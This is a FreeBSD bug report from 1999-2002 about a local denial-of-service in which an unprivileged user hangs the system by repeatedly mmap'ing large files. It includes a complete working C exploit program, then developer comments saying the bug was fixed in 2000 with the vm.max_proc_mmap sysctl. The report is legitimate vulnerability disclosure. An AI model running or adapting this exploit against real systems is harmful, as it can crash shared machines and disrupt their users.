Bug 14614

Summary: VM DoS attack (with exploit attached)
Product: Base System Reporter: sobomax <sobomax>
Component: kernAssignee: Matt Dillon <dillon>
Status: Closed FIXED    
Severity: Affects Only Me    
Priority: Normal    
Version: 4.0-CURRENT   
Hardware: Any   
OS: Any   

Description sobomax 1999-10-31 00:10:00 UTC 
Any unpriveleged user with shell access and 10-20MB of disk quiota
can hang FreeBSD machine using following program. This program is simply 
mmap'ing large files without unmap'ing them. I have not found a way to
prevent this attack neither using disk quotas nor using memory limits in
login.conf.

I'm personally tested it works on 4.0, however others reports that 3.3
is also affected.

How-To-Repeat: #include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

main()
{
    int fd;
    int i;
    int len=1024*1024*10;  /*ie 10Mbytes*/
    caddr_t addr;
    char ttt[80];

    for (i=0;;i++)
    {
    sprintf (ttt,"%d",i);
    fd=open(ttt,O_CREAT|O_RDWR,0666);
    if (fd<0)
    {
        printf("open error %ld\n",errno);
        exit(1);
    }
    lseek(fd,len-1,SEEK_SET);
    write(fd,"",1);
    addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
    if (addr==MAP_FAILED)
    {
        printf("mmap error %ld",errno);
        exit(1);
    }
    close(fd);
    memset(addr,'x',len);
    }
}
Comment 1 Kris Kennaway freebsd_committer freebsd_triage 2000-06-26 07:12:22 UTC 
Responsible Changed
From-To: freebsd-bugs->dillon

Verified this does do something nasty even with resource limits in 
place (I was seeing what seemed to be a held inode lock in the kernel) 
I also had pagedaemon going crazy when I ran this on an MFS.
Comment 2 hiten pandya 2002-03-20 15:36:12 UTC 
Is this issue solved?

  -- Hiten
  -- <hiten@uk.FreeBSD.org>

__________________________________________________
Do You Yahoo!?
Yahoo! Sports - live college hoops coverage
http://sports.yahoo.com/
Comment 3 Matt Dillon freebsd_committer freebsd_triage 2002-03-20 18:44:45 UTC 
State Changed
From-To: open->closed

This bug was fixed in Feb 2000 (2 years ago).  We now limit the number of 
tracking structures the kernel is able to allocate on behalf of any single 
process via the vm.max_proc_mmap sysctl.
Comment 4 Matthew Dillon 2002-03-20 18:45:03 UTC 
:Is this issue solved?
:
:  -- Hiten
:  -- <hiten@uk.FreeBSD.org>
:
:__________________________________________________
:Do You Yahoo!?
:Yahoo! Sports - live college hoops coverage
:http://sports.yahoo.com/

    I'll close the ticket.  It was fixed in February 2000 (two years ago).
    We now have a vm.max_proc_mmap sysctl that limits the number of 
    vm_map_entry structures the kernel is allowed to allocate on behalf of
    a process.

					-Matt
					Matthew Dillon 
					<dillon@backplane.com>